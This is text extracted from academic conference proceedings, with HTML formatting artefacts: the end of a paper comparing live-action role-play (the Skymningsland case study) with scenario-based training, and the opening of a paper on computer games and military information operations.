curriculum. At Østerskov Efterskole an educational framework and narrative eng<strong>in</strong>e fill a function similar<br />
to the scenario <strong>in</strong> scenario-based tra<strong>in</strong><strong>in</strong>g. With<strong>in</strong> this, the students take on a role different from the self<br />
134
Sara Hjalmarsson<br />
and an element that demonstrates one's participation (eg. a costume). Roles and costumes do not<br />
necessarily need to be complex and can be symbolic <strong>in</strong> nature. The use of a role that is different from the<br />
self allows the student an opportunity to learn from mistakes <strong>in</strong> a safe environment without identify<strong>in</strong>g<br />
personally with them.<br />
Other elements critical to the success of Edu-LARP <strong>in</strong>clude preparation before the LARP event,<br />
participation dur<strong>in</strong>g it, evaluation after the event is over and the <strong>in</strong>corporation of perceived free will.<br />
Dur<strong>in</strong>g the preparation stage, the scene is set, characters are created and self-study, research, sem<strong>in</strong>ars<br />
or tutorials take place. Dur<strong>in</strong>g the LARP event, the participat<strong>in</strong>g student becomes deeply engaged <strong>in</strong> the<br />
activity, which improves his or her learn<strong>in</strong>g (Hyltoft, 2010, Lunau, 2010).<br />
The evaluation stage that follows the LARP activity co<strong>in</strong>cides with the recommendations made by Burke<br />
& Salas (2002) and V<strong>in</strong>cenzi (2008) for scenario-based tra<strong>in</strong><strong>in</strong>g who advise this step to gauge participant<br />
learn<strong>in</strong>g. The perception of free will is about allow<strong>in</strong>g the learner to make logical decisions without be<strong>in</strong>g<br />
h<strong>in</strong>dered by non-contextual constra<strong>in</strong>ts. It implies that any prescribed options must have a viable<br />
foundation with<strong>in</strong> the narrative framework (Hyltoft, 2010).<br />
Figure 3: The Edu-LARP cycle, adapted from Hyltoft (2010) and Lunau (2010)<br />
The students at Østerskov Efterskole are often used <strong>in</strong> tra<strong>in</strong><strong>in</strong>g exercises conducted by local emergency<br />
services. They are preferred to others due to their dynamic improvisation skills and cost-effectiveness. As<br />
their skills improve, they become able to work with uncerta<strong>in</strong>ty, develop scenarios and, as stated by<br />
Lunau 2010, “th<strong>in</strong>k like the enemy, without becom<strong>in</strong>g the enemy” (Hyltoft, 2010, Lunau, 2010). Presently,<br />
there exists little academic research and documentation on the subjects of LARP and Edu-LARP.<br />
Montala & Stenros (2010) and Bowman (2010) have conducted academic research and published<br />
comprehensive material on the subject. However, much of the documentation currently available is<br />
<strong>in</strong>formal and may consist of onl<strong>in</strong>e videos, articles on wikis, discussions <strong>in</strong> forums or material <strong>in</strong> onl<strong>in</strong>e<br />
<strong>in</strong>tranets. In addition, documentation is not always available <strong>in</strong> English. A scripted scenario <strong>in</strong>volv<strong>in</strong>g a<br />
staged attack on a car <strong>in</strong> the event Skymn<strong>in</strong>gsland (discussed later <strong>in</strong> this paper) is publicly available on<br />
Youtube (Postapoka, 2010), but it is <strong>in</strong> Swedish. The Skymn<strong>in</strong>gsland post-event presentation is also<br />
available on Youtube (Supernaut242, 2010), but is also only available <strong>in</strong> Swedish. This can make it<br />
challeng<strong>in</strong>g to f<strong>in</strong>d useful data. Furthermore, there are significant regional differences <strong>in</strong> nomenclature<br />
and practice. These offer a hurdle to research<strong>in</strong>g the subject and obta<strong>in</strong><strong>in</strong>g verifiable reference material.<br />
Another concern that has been voiced about LARP revolves around disappo<strong>in</strong>t<strong>in</strong>g or unpleasant<br />
experiences. Some people participate <strong>in</strong> a particular event and either do not enjoy it or ga<strong>in</strong> noth<strong>in</strong>g from<br />
it. An explanation for this phenomenon is that LARP and Edu-LARP events have different styles and<br />
characteristics and if a participant's personal preference does not align with a particular style, his or her<br />
135
Sara Hjalmarsson<br />
experience may be unreward<strong>in</strong>g (Mäkelä, Koist<strong>in</strong>en, Siukola, Turunen, 2005). For this reason, it is helpful<br />
to understand some of the different models. The GNS theory developed by Edwards (2001) is referred to<br />
<strong>in</strong> Mäkelä et al. (2005) and offers a useful classification model. An extensive discussion of LARP models<br />
and LARP theory is outside the scope of this paper. Anyone who wishes to read further about LARP<br />
models and theories, both Mäkelä et al. and Montola & Stenros (2010) provide a detailed overview.<br />
Figure 4: The three orientations illustrated as corners of an equilateral triangle, adapted from Mäkelä et<br />
al (2005) and Kim (2003a, 2003b and 2005)<br />
The Gamist orientation focuses on competition between participants as enterta<strong>in</strong>ment. Victory and loss<br />
conditions are very clear-cut, such as through a measure of po<strong>in</strong>ts.<br />
Narrativist events focus on creat<strong>in</strong>g story and drama. The enterta<strong>in</strong>ment factor created <strong>in</strong> these events<br />
also differs from that of gamist events.<br />
Immersionist/Simulationist oriented events can resemble simulations. This type of event requires a<br />
unique set of skills from both the organiser and the participant. Such an event <strong>in</strong>volves the greatest level<br />
of immersion <strong>in</strong>to the scenario and role.<br />
4. A case study<br />
To compare and contrast LARP and scenario-based tra<strong>in</strong><strong>in</strong>g, a case study was conducted of the Swedish<br />
LARP production Skymn<strong>in</strong>gsland (<strong>in</strong>formally referred to as Duskland <strong>in</strong> English), organised by the nonprofit<br />
association Lajvfören<strong>in</strong>gen Solnedgång <strong>in</strong> 2010. Skymn<strong>in</strong>gsland was a realistic 4-day event set <strong>in</strong> a<br />
fictitious, contemporary post-conflict environment. The activities of the organisers were followed via direct<br />
communication us<strong>in</strong>g email and chat; the event website, <strong>in</strong>tranet and forum; record<strong>in</strong>gs of event<br />
presentations; direct observation of pre-event meet<strong>in</strong>gs, observation of the event itself and video<br />
record<strong>in</strong>gs of the post-event presentation at Snakkeklubben 2010. Participant activities were followed via<br />
the event <strong>in</strong>tranet, forum, emails, participant meet<strong>in</strong>gs, workshops and a participant survey. The case<br />
study revealed similarities and differences between scenario-based tra<strong>in</strong><strong>in</strong>g and those of LARP. The<br />
Skymn<strong>in</strong>gsland production commenced with an extensive plann<strong>in</strong>g and preparation phase. Dur<strong>in</strong>g this<br />
phase, the organisers scouted locations, planned and budgeted. Feedback from previous events and<br />
peers served to guide them as the scenario, narrative, context and scripted scenarios were developed.<br />
Guidel<strong>in</strong>es, graphics and literature was created and made publicly available via the event website.<br />
Skymn<strong>in</strong>gsland was formally announced at the Knutepunkt conference <strong>in</strong> April, 2010 and the 2010 Prolog<br />
LARP convention, later <strong>in</strong> the year (Utbult, et al., 2010).<br />
Once an <strong>in</strong>dividual registered, they were required to design and describe the fictitious character they<br />
wished to play. They were also required to list any real-world skills that could be useful <strong>in</strong> the event (eg.<br />
stage fight<strong>in</strong>g, pyrotechnics licence, first aid tra<strong>in</strong><strong>in</strong>g, etc.). To assist <strong>in</strong> develop<strong>in</strong>g an appropriate<br />
character, the website provided a list of suggested read<strong>in</strong>g and view<strong>in</strong>g <strong>in</strong> addition to the guidel<strong>in</strong>es,<br />
136
Sara Hjalmarsson<br />
literature and concept art. Individual coach<strong>in</strong>g was also offered for free to each participant and <strong>in</strong>volved<br />
both feedback on the submitted description and personal advisory. (Lajvfören<strong>in</strong>gen Solnedgång, 2010a;<br />
Utbult, et al., 2010). Once approved, the fictitious character descriptions became searchable and could<br />
be viewed by other registered participants. This allowed them to identify other participants with which to<br />
collaborate and build fictitious relationships, create m<strong>in</strong>i-scenarios, or develop and rehearse scripted<br />
scenes with<strong>in</strong> the constra<strong>in</strong>ts of the event guidel<strong>in</strong>es. The participants task dur<strong>in</strong>g the event consisted of<br />
fulfill<strong>in</strong>g these m<strong>in</strong>i-scenarios and respond<strong>in</strong>g to scenarios aris<strong>in</strong>g spontaneously due to the improvised<br />
participant-participant <strong>in</strong>teraction and those scenarios that were scripted by the organisers<br />
(Lajvfören<strong>in</strong>gen Solnedgång 2010a, Lajvfören<strong>in</strong>gen Solnedgång 2010b, Utbult, et al., 2010, Karlsson<br />
2010).<br />
Prior to the start of Skymn<strong>in</strong>gsland, participants were briefed on safety, rules and guidel<strong>in</strong>es along with<br />
act<strong>in</strong>g techniques. This occurred through written documents and a general brief on site. Additionally,<br />
participants were provided with a compulsory workshop on act<strong>in</strong>g, stunts and safety. Dur<strong>in</strong>g the event<br />
itself, participants were free to act and respond as they wished with<strong>in</strong> the constra<strong>in</strong>ts of the scenario, their<br />
own role design and the rules and guidel<strong>in</strong>es prescribed for the event. Experienced organisers and<br />
functionaries were strategically and discretely dispersed throughout the event location to monitor and<br />
manage it, provide quick response and ensure safety. This strategy allowed organisers to address<br />
<strong>in</strong>cidents and emergencies with m<strong>in</strong>imal disruption (Lajvfören<strong>in</strong>gen Solnedgång 2010a; Karlsson 2010,<br />
Utbult et al. 2010). The event was followed by a significant debrief and assessment period. It commenced<br />
with a short, formal debrief, followed by several hours of socialis<strong>in</strong>g where participants could share and<br />
discuss their experiences. Follow<strong>in</strong>g the event, participants were encouraged to share footage and<br />
provide feedback on the event <strong>in</strong> the onl<strong>in</strong>e forum. Onl<strong>in</strong>e character data could still be edited and thus,<br />
could be updated with the character's story as it had evolved dur<strong>in</strong>g the event (Utbult et al. 2010,<br />
Karlsson 2010).<br />
The feedback, photos and filmed material was reta<strong>in</strong>ed by the organisation. A report on the<br />
Skymn<strong>in</strong>gsland event was also presented for the Snakkeklubben LARP discussion club (Karlsson, 2010).<br />
All this material contributed to the expansion of the knowledge bank that Lajvfören<strong>in</strong>gen Solnedgång has<br />
been build<strong>in</strong>g s<strong>in</strong>ce its first event. This knowledge bank feeds <strong>in</strong>to the plann<strong>in</strong>g and preparation stage of<br />
the organisation's next event as the data is used to develop and improve future productions.<br />
(Lajvfören<strong>in</strong>gen Solnedgång, 2010a; Utbult, et al., 2010). The survey results <strong>in</strong>dicated that the majority of<br />
respondents learned from participat<strong>in</strong>g at the event and that there was a higher likelihood of learn<strong>in</strong>g from<br />
team situations than <strong>in</strong>dividual situations. 52% felt their ability to manage a crisis had improved, 77% felt<br />
better prepared to deal with real-life situations resembl<strong>in</strong>g what they experienced <strong>in</strong> the event and 63%<br />
had learned a new skill. Virtually all (97%) respondents had fun while participat<strong>in</strong>g.<br />
Figure 5 Components of the methodology used by the organisers of the Skymn<strong>in</strong>gsland LARP event,<br />
adapted from Utbult, et al. 2010a and Utbult et al. 2010b, Karlsson 2010 and Lajvfören<strong>in</strong>gen<br />
Solnedgång, (2010a-d)<br />
137
Sara Hjalmarsson<br />
The methodology used by Lajvfören<strong>in</strong>gen Solnedgång is illustrated <strong>in</strong> figure 5. When compared with the<br />
components and processes of the scenario-based tra<strong>in</strong><strong>in</strong>g cycles (Burns et al. 1998, Burke & Salas, 2002<br />
and V<strong>in</strong>cenzi 2008), they demonstrate a number of similarities. These are illustrated <strong>in</strong> table 1 and table<br />
2.<br />
Table 1: Comparison of processes from scenario-based tra<strong>in</strong><strong>in</strong>g and the Skymn<strong>in</strong>gsland event<br />
Processes Scenario-based tra<strong>in</strong><strong>in</strong>g Skymn<strong>in</strong>gsland<br />
Preparation<br />
and plann<strong>in</strong>g<br />
Audience, task, learn<strong>in</strong>g objectives,<br />
competencies<br />
Execution Event scenario, performance<br />
measurement, data collection,<br />
performance diagnosis<br />
Assessment Feedback and AAR, archive performance<br />
data, skills <strong>in</strong>ventory<br />
Desired audience, organiser objectives, participant<br />
objectives, scenario and event, market<strong>in</strong>g<br />
Scripted scenarios, unscripted and participant-created<br />
scenarios, monitor<strong>in</strong>g and management. No formal<br />
data collection or performance diagnostic.<br />
Formal and <strong>in</strong>formal debrief and feedback, archive<br />
event and event evaluation data<br />
Table 2: Comparison of components from scenario-based tra<strong>in</strong><strong>in</strong>g and the Skymn<strong>in</strong>gsland event<br />
Scenario-based tra<strong>in</strong><strong>in</strong>g Skymn<strong>in</strong>gsland<br />
Skill <strong>in</strong>ventory and performance data Knowledge bank and feedback from previous events. Character<br />
development records (where applicable).<br />
Tasks and KSAs Expectations and requirements. <strong>Limited</strong> knowledge of KSAs.<br />
Tra<strong>in</strong><strong>in</strong>g objectives Event objectives and participant objectives<br />
Exercises, events, curriculum, scenarios,<br />
scripts<br />
Organisers plan workshops, scripted scenarios and dramaturgy.<br />
They also assess non-scripted plot development, coach<br />
participants and design the event.<br />
Participans self-study, design costumes, props and characters.<br />
They also plan scenarios with other participants.<br />
Performance measures and standards Personal goals for participants. Community and <strong>in</strong>formal standards<br />
for event.<br />
Feedback and debrief Short formal debrief. Extensive <strong>in</strong>formal debrief. Feedback via<br />
forum, socialis<strong>in</strong>g, website and events.<br />
Similarities were found primarily <strong>in</strong> terms of the processes and components <strong>in</strong>volved <strong>in</strong> design<strong>in</strong>g,<br />
execut<strong>in</strong>g and conclud<strong>in</strong>g the scenario. Differences could be observed <strong>in</strong> details relat<strong>in</strong>g to the different<br />
needs and objectives of scenario-based tra<strong>in</strong><strong>in</strong>g for education and LARP for enterta<strong>in</strong>ment. Both<br />
evaluated the needs of their audience and required competencies, but the scenario objectives were very<br />
different. The objective of Skymn<strong>in</strong>gsland was to be a satisfy<strong>in</strong>g event, so objectives depended on market<br />
research, rather than educational theory. Both discipl<strong>in</strong>es offered scripted events, but Skymn<strong>in</strong>gsland<br />
placed significant focus on unscripted activity. In addition, it lacked performance measures, <strong>in</strong> contrast to<br />
scenario-based tra<strong>in</strong><strong>in</strong>g.<br />
Feedback and debrief constitute an important step <strong>in</strong> both scenario-based tra<strong>in</strong><strong>in</strong>g and the<br />
Skymn<strong>in</strong>gsland event. Where this stage is formal <strong>in</strong> scenario-based tra<strong>in</strong><strong>in</strong>g, at Skymn<strong>in</strong>gsland, it was<br />
<strong>in</strong>formal, consist<strong>in</strong>g of discussion and socialis<strong>in</strong>g between <strong>in</strong>dividual participants. The formal feedback<br />
focused on the organisers of the event and was conducted by the participants us<strong>in</strong>g web-based tools.<br />
The processes and tools used for the Skymn<strong>in</strong>gsland events could be adapted for use <strong>in</strong> simulations and<br />
exercises related directly to <strong>in</strong>formation warfare. Live events could be used to prepare for situations<br />
<strong>in</strong>volv<strong>in</strong>g social eng<strong>in</strong>eer<strong>in</strong>g, swarm<strong>in</strong>g and physical aspects of <strong>in</strong>formation security. Additionally, they<br />
could be complemented with virtual activities, such as simulation of a cyber attack. The onl<strong>in</strong>e tools used<br />
to develop characters, fictitious relationships and m<strong>in</strong>i-scenarios could be developed <strong>in</strong>to a tuition and<br />
feedback tool. The organisers could be employed for scenario-generation and the participants could be<br />
employed as <strong>in</strong>teractive role-players.<br />
5. The need for further research<br />
Research on LARP and Edu-LARP is currently be<strong>in</strong>g conducted by academia and private <strong>in</strong>itiatives. One<br />
such private <strong>in</strong>itiative is the International Comparative LARP Study (Kann, 2010a and Kann, 2010b),<br />
138
Sara Hjalmarsson<br />
which aims to survey LARP communities <strong>in</strong> different countries. This and other research is critical for<br />
determ<strong>in</strong><strong>in</strong>g how LARP and Edu-LARP can be used <strong>in</strong> scenario-based tra<strong>in</strong><strong>in</strong>g for security, crisis<br />
preparedness, <strong>in</strong>formation warfare, authentic task<strong>in</strong>g, critical <strong>in</strong>frastructure and emergency services.<br />
Future studies should consider a wider range of LARP cultures, models and styles to determ<strong>in</strong>e whether<br />
these are variables with an impact on effectiveness. Such a study must also take <strong>in</strong>to consideration<br />
pervasive LARP models. Research <strong>in</strong>to these and other variables would also aid <strong>in</strong> determ<strong>in</strong><strong>in</strong>g the<br />
scope with<strong>in</strong> which LARP could prove a useful tool and where it is not appropriate to implement it.<br />
Literature such as Bowman 2010 and Ungdomsstyrelsen 1997 (translated by Larsson, n.d.) and<br />
<strong>in</strong>terviews (Lunau 2010 and Hyltoft 2010) <strong>in</strong>dicate that LARP participation aids <strong>in</strong> identity creation.<br />
Speculatively, this may reduce an <strong>in</strong>dividual's vulnerability to factors lead<strong>in</strong>g to radicalisation, such as<br />
identification with extremist groups. Thus, it may offer an avenue for the prevention of terrorism and<br />
crime. Although such a topic lies outside the scope of this particular paper, future research could explore<br />
this area further.<br />
Future research could also explore further, the various ways <strong>in</strong> which experienced LARP participants or<br />
organisers could be <strong>in</strong>tegrated <strong>in</strong>to pre-exist<strong>in</strong>g or new scenario-based tra<strong>in</strong><strong>in</strong>g programs. Such a study<br />
may explore how the same participants and organisers may be tra<strong>in</strong>ed or educated <strong>in</strong> order to adapt their<br />
skills to a professional tra<strong>in</strong><strong>in</strong>g environment. Such a study could contribute to a reduction of<br />
unemployment, both by creat<strong>in</strong>g opportunities for the LARPers themselves and for the <strong>in</strong>dividuals they<br />
tra<strong>in</strong>. It may also be relevant for research to design and test Edu-LARP activities tailored for the<br />
emergency services, security or even a crisis management team. For such an event to be appropriately<br />
designed, it will be necessary to f<strong>in</strong>d <strong>in</strong>dividuals with appropriate experience and determ<strong>in</strong>e key success<br />
factors.<br />
6. Conclusion<br />
The implementation and research of Edu-LARP with<strong>in</strong> traditional and adult education and the <strong>in</strong>dications<br />
of survey respondents demonstrates that LARP and Edu-LARP holds educational value. This holds true,<br />
even when LARP events are tailored toward enterta<strong>in</strong>ment, as opposed to learn<strong>in</strong>g. Whereas a hybrid<br />
model could be tailored to dist<strong>in</strong>ct needs, it may also be possible for <strong>in</strong>dividuals to attend an appropriate<br />
LARP and self-manage their learn<strong>in</strong>g process.<br />
This paper highlights the fact that LARP and Edu-LARP can offer several useful tools for scenario-based<br />
tra<strong>in</strong><strong>in</strong>g and simulation. Nevertheless, further research is needed <strong>in</strong> order to determ<strong>in</strong>e how LARP can be<br />
most effectively utilised, ascerta<strong>in</strong> determ<strong>in</strong>ants of success and identify a means to evaluate the<br />
appropriateness of non-educational LARP for tra<strong>in</strong><strong>in</strong>g purposes. Develop<strong>in</strong>g and test<strong>in</strong>g different LARP<br />
models for tra<strong>in</strong><strong>in</strong>g purposes is yet another topic for future research. Additionally, future research may<br />
ascerta<strong>in</strong> how organisers and participants can have their skills made more relevant to scenario-based<br />
tra<strong>in</strong><strong>in</strong>g for critical <strong>in</strong>frastructure, emergency services and crisis preparedness. Furthermore, the role of<br />
LARP <strong>in</strong> identity formation could be researched to determ<strong>in</strong>e its value <strong>in</strong> counter-radicalisation.<br />
References<br />
Bioterrorism week, 2007. Mecklemburg EMS <strong>in</strong>troduces most-advanced situational tra<strong>in</strong><strong>in</strong>g <strong>in</strong> America for emergency<br />
medical personnel. Bioterrorism week, October 1, 2007,page 11. [electronic journal]. Available from <br />
[Accessed April 15th, 2010]<br />
Blanchard, P. N., Thacker, J. W. (2010) Effective Tra<strong>in</strong><strong>in</strong>g: Systems, strategies and practices. Pearson Education,<br />
New Jersey.<br />
Bowman, S. L. (2010) The function of role-play<strong>in</strong>g games: How participants create community, solve problems and<br />
explore identity. McFarland Press, NC.<br />
Burke, C.S., Salas, E., 2002. Simulation for tra<strong>in</strong><strong>in</strong>g is effective when. Quality and safety <strong>in</strong> healthcare, 11(2), pp.119-<br />
120. Available at [Accessed June 4, 2010]<br />
Burns, J. J., Cannon-Bowers, J. A., Pruitt, J. S., Salas, E. (1998) Advanced technology <strong>in</strong> scenario-based tra<strong>in</strong><strong>in</strong>g. In:<br />
Mak<strong>in</strong>g decisions under stress: Implications for <strong>in</strong>dividual and team tra<strong>in</strong><strong>in</strong>g. pp. 365-374. Available from<br />
[ Accessed June 4, 2010]<br />
Bøckman, Petter. 2003. The Three Way Model — Revision of the Threefold Model. In Gade, Morten, Thorup, L<strong>in</strong>e, &<br />
Sander, Mikkel (eds), As Larp Grows Up — Theory and Methods, pp. 12-17. [E-book]. Available from<br />
http://www.darkshire.net/ jhkim/rpg/theory/threefold/faq_larp.html [Accessed April 16th, 2010]<br />
Cohn, J. C., Lyons, D.M., Schmorrow, D. (2002) “Scenario-based tra<strong>in</strong><strong>in</strong>g with virtual technologies and<br />
environments”. Proceed<strong>in</strong>gs of the Image 2002 conference, Arizona, US.<br />
Edwards, R. (2001). GNS and Other Matters of Role-play<strong>in</strong>g Theory [onl<strong>in</strong>e]. Available from http://www.<strong>in</strong>dierpgs.com/<br />
articles/1 [ Accessed December 27, 2010]<br />
139
Sara Hjalmarsson<br />
ELIN (2010). “Welcome to ELIN”, [onl<strong>in</strong>e] Available from http://www.edularp.org/<strong>in</strong>dex.php?option=com_content&view=frontpage&Itemid=7<br />
[Accessed on April 23, 2010]<br />
Fören<strong>in</strong>gen Knutpunkt, Betahaus (n.d.) “What is Knudepunkt?”, [onl<strong>in</strong>e] Available from http://www.knudepunkt.org/<br />
[Accessed December 14, 2010]<br />
Honoré, G.R.L., Zajac, D.L., 2005. Theater immersion: First army post-mobilisation tra<strong>in</strong><strong>in</strong>g. Armor. May/June 2005,<br />
page 12. [electronic journal]. Available from . [Accessed April 14, 2010]<br />
Hyltoft, M. 2010.Interviewed by Hjalmarsson, S. [video <strong>in</strong>terview]. Osted Fri- og Efterskole, Osted, Denmark. August<br />
18, 2010.<br />
Hyltoft, M. (2008) The role-player's school: Østerskov Efterskole. In Montola, M., Stenros, J. (editors) (2008)<br />
Playground worlds: Creat<strong>in</strong>g and evaluat<strong>in</strong>g experiences of Role-play<strong>in</strong>g games, pp.12-25. [E-book]. Available<br />
from http://www.solmukohta.org/pub/Playground_Worlds_2008.pdf [Accessed April 16th, 2010]<br />
Interact<strong>in</strong>g Arts (2010) “New Anthology on Nordic live Role-Play<strong>in</strong>g: Play<strong>in</strong>g reality”, [onl<strong>in</strong>e] Available from<br />
http://<strong>in</strong>teract<strong>in</strong>garts.org/blogs/<strong>in</strong>dex.php?title=title_6&more=1&c=1&tb=1&pb=1 [Accessed April 22, 2010]<br />
Kann, T. (n.d.) “International Comparative LARP Study” [onl<strong>in</strong>e]. Accessed February 22, 2010 from http://www.larpresearch.net<br />
Kann, T. (2011) “International Comparative LARP Study”. Presentation held at Knudepunkt 2011, Hels<strong>in</strong>ge,<br />
Denmark, February.<br />
Karlsson, P. (2010) “Skymn<strong>in</strong>gsland”. Presentation held at Snakkeklubben, Stockholm, Sweden, September.<br />
Kim, J. H. (2003a). “The Threefold Model FAQ”, [onl<strong>in</strong>e], http://www.darkshire.net/jhkim/rpg/theory/<br />
threefold/faq_v1.html. [Accessed January 6th 2011]<br />
Kim, J. H. (2003b). “The Orig<strong>in</strong> of the Threefold Model”, [onl<strong>in</strong>e],<br />
http://www.darkshire.net/jhkim/rpg/theory/threefold/orig<strong>in</strong>.html [Accessed January 6th 2011]<br />
Kim, J. H. (2005). “The Evolution of the Threefold Model “, [onl<strong>in</strong>e],<br />
http://www.darkshire.net/jhkim/rpg/theory/threefold/evolution.html [Accessed January 6th 2011]<br />
Lajvfören<strong>in</strong>gen Solnedgång. (2010a) “Skymn<strong>in</strong>gsland”, [onl<strong>in</strong>e], http://www.solnedgang.org/skymn<strong>in</strong>gsland<br />
Lajvfören<strong>in</strong>gen Solnedgång. (2010b). “Skymn<strong>in</strong>gsland for Dummies”, [onl<strong>in</strong>e],<br />
http://www.solnedgang.org/skymn<strong>in</strong>gsland/?page=48<br />
Lajvfören<strong>in</strong>gen Solnedgång. (2010c) “Lite data” [onl<strong>in</strong>e], Available at http://www.solnedgang.org/skymn<strong>in</strong>gsland<br />
Larsson, E. (n.d) Role-play<strong>in</strong>g as leisure activity: Report from The Swedish National board for Youth Affairs<br />
[translation]. Available from<br />
http://www.dragonbane.org/attachment/f20c14076824322fa2a4f3c2d7b6c3fc/7608fbb646610f702d18a51bc944<br />
c760/role-play<strong>in</strong>g.pdf [Accessed August 30, 2010]<br />
Lunau, M. 2010. Interviewed by Hjalmarsson, S. [video <strong>in</strong>terview]. Østerskov Efterskole, Hobro, Denmark. August 17,<br />
2010<br />
Moats, J.B., Chermack, T.J., Dooley, L.M., 2008. Us<strong>in</strong>g Scenarios to develop crisis managers: Applications of<br />
scenario plann<strong>in</strong>g and scenario-based tra<strong>in</strong><strong>in</strong>g. Advances <strong>in</strong> develop<strong>in</strong>g human resources, 10(3), pp. 397-424.<br />
[electronic journal]. Available from http://adh.sagepub.com/cgi/content/abstract/10/3/397 [Accessed April 14th,<br />
2010]<br />
Montola, M., Stenros, J. (editors) (2008) Playground worlds: Creat<strong>in</strong>g and evaluat<strong>in</strong>g experiences of Role-play<strong>in</strong>g<br />
games. [electronic edition]. Accessed April 16th, 2010 from<br />
http://www.solmukohta.org/pub/Playground_Worlds_2008.pdf<br />
Montola, M., Stenros, J. (2010) Nordic LARP. Fëa Livia, Stockholm.<br />
Mäkelä, E., Koist<strong>in</strong>en, Siukola, Turunen (2005) “The process model of Role-Play<strong>in</strong>g”. In Bøckmann, P., Hutchison, R.<br />
(editors) (2005) Dissect<strong>in</strong>g LARP [E-book], pp. 205-236. Available from<br />
http://knutepunkt.laiv.org/kp05/dissectionlarp.pdf [Accessed April 26th, 2010]<br />
Oser, R. L. (1999) “Enhanc<strong>in</strong>g human performance <strong>in</strong> technology-rich environments: Guidel<strong>in</strong>es for scenario-based<br />
tra<strong>in</strong><strong>in</strong>g”. In Salas, E. Human/technology <strong>in</strong>teraction <strong>in</strong> complex systems. Vol 9, pp. 175-202. Stamford: JAI<br />
press.<br />
Postapoka, 2010. Skymn<strong>in</strong>gsland – Bil<strong>in</strong>cidenten. [video onl<strong>in</strong>e], Available at<br />
http://www.youtube.com/watch?v=KfUXnjYIBZ8 [Accessed October 18, 2010]<br />
Steadman, R., Coates, W. C., Huang, Y. M., Matevosian, R., Larmon, B. R., McCullough, L., Ariel, D. (2006).<br />
"Simulation-based tra<strong>in</strong><strong>in</strong>g is superior to problem-based learn<strong>in</strong>g for the acquisition of critical assessment and<br />
management skills". Critical care medic<strong>in</strong>e, 34 (1), p. 151. Available from<br />
http://journals.lww.com/ccmjournal/Abstract/2006/01000/Simulation_based_tra<strong>in</strong><strong>in</strong>g_is_superior_to.21.aspx<br />
[Accesed June 4, 2010]<br />
Supernaut242, 2010. Skymn<strong>in</strong>gsland @ Snakkeklubben Stockholm [video onl<strong>in</strong>e]. Available at<br />
http://www.youtube.com/watch?v=b8SmixHWoF0 [Accessed November 2, 2010]<br />
Ungdomsstyrelsen, 1997 Rollspel som fritidssysselsättn<strong>in</strong>g. Available from<br />
http://www.dragonbane.org/attachment/f20c14076824322fa2a4f3c2d7b6c3fc/0a2267918c7179c75df094e8550f<br />
37e9/rollspelsomfritidsysselsattn<strong>in</strong>g.pdf [Accessed August 30, 2010]<br />
Utbult, S., Axner, J., Sortti, A., Wallgren, S., 2010. [chat, personal messages and E-mail] (Personal communications<br />
2 February 2010 – September 5, 2010).<br />
V<strong>in</strong>cenzi, D. A., Wise, J. A. (2008) Human factors <strong>in</strong> simulation and tra<strong>in</strong><strong>in</strong>g. USA: CRC Press.<br />
Whitcomb, C. (1999). Scenario-based tra<strong>in</strong><strong>in</strong>g at the FBI. American Society for Tra<strong>in</strong><strong>in</strong>g & Development, June 1999,<br />
p. 42. [electronic journal]. Available at Accessed April 14th,<br />
2010<br />
140
Computer Games as the Representation of Military<br />
Information Operations – A Philosophical Description of<br />
Cyborgiz<strong>in</strong>g of Propaganda Warfare<br />
Aki-Mauri Huht<strong>in</strong>en<br />
F<strong>in</strong>nish National Defence University, F<strong>in</strong>land<br />
aki.huht<strong>in</strong>en@mil.fi<br />
Abstract: The history of combat is primarily the history of radically chang<strong>in</strong>g fields of perception. In other words, war<br />
consists not so much of scor<strong>in</strong>g territorial, economic or other material victories but of appropriat<strong>in</strong>g the immateriality<br />
of perceptual field. The function of the eye has become the function of the weapons (Virilio 1989; 2009). To<br />
understand <strong>in</strong>formation age warfare we have to understand the concept of representation as a part of our process of<br />
violence. The idea of <strong>in</strong>formation warfare or an <strong>in</strong>formation operation is based on the process where the physical<br />
target is no longer destroyed with the k<strong>in</strong>etic systems, but the process where the non-k<strong>in</strong>etic systems, like<br />
<strong>in</strong>formation, scan the symbols-semiotics networks. Today, particularly the advanced mobile technology, the Internet<br />
and the enterta<strong>in</strong>ment <strong>in</strong>dustry immensely exploit the experiences from different wars and conflicts for example as<br />
ideas of computer games. In return the military <strong>in</strong>dustrial complex represents its own language for example <strong>in</strong> the<br />
concept of <strong>in</strong>formation operations with the help of applications particularly ris<strong>in</strong>g from the enterta<strong>in</strong>ment <strong>in</strong>dustry. The<br />
roles of Hector and Achilles, the teach<strong>in</strong>gs of Jom<strong>in</strong>i and Clausewitz have an effect <strong>in</strong> the background of games and<br />
gam<strong>in</strong>g. Opposite to Clauseiwitz’s th<strong>in</strong>k<strong>in</strong>g, Jom<strong>in</strong>i took the view that the amount of force deployed should be kept to<br />
the m<strong>in</strong>imum <strong>in</strong> order to lower casualties and that war was a science, not an art. The most central genres <strong>in</strong> gam<strong>in</strong>g<br />
are ”strategy”, ”adventure”, ”shooter”, ”sports”, ”simulation”, ”music”, ”role play<strong>in</strong>g” and ”puzzle”. All of these are<br />
related to warfare one way or another. Another <strong>in</strong>terest<strong>in</strong>g fact is that <strong>in</strong> the 1950’s the first computer games were<br />
mathematic strategy based games that that had been developed <strong>in</strong> universities (Czosseck 2009; Peltoniemi 2009).<br />
Keywords: computer games, decision mak<strong>in</strong>g, <strong>in</strong>formation operations, propaganda, representation<br />
1. Introduction<br />
Accord<strong>in</strong>g to Sun Tzu the acme of the Art of War is a victory without fight<strong>in</strong>g. Chess can be considered as<br />
a game connected to the art or war, which follows a clear rational pattern, but the endless number of<br />
options makes it chaotic, creative, sudden and even tragic. In his classic piece the Iliad Homer describes,<br />
through the warriors Hector and Achilles, the two central roles of warfare: warfare controlled by duty and<br />
warfare controlled by emotion. This duality can be seen throughout the history of the western art of war,<br />
sometimes emphasiz<strong>in</strong>g the rational and normative nature of warfare (Hector) and sometimes the<br />
<strong>in</strong>tuitive, subconscious and emotional nature of warfare (Achilles). As the science of a new age advanced<br />
Jom<strong>in</strong>i developed geometric and mathematical models for warfare, whereas Clausewitz saw that war<br />
cannot be controlled rationally and it is always affected by chance or friction. Today, we can f<strong>in</strong>d this<br />
evolution of warfare, for example, <strong>in</strong> computer games (Bosquet 2009; Taylor 2003).<br />
War themed computer games also have the characteristics of real warfare plann<strong>in</strong>g (Allen 2010; Virilio<br />
2009; Zizek 2010). In the games you can fight almost <strong>in</strong> a way that feels physically real, advanc<strong>in</strong>g blockby-<br />
block and by fir<strong>in</strong>g at targets, enemies or objects, you can change weapons and ammunition<br />
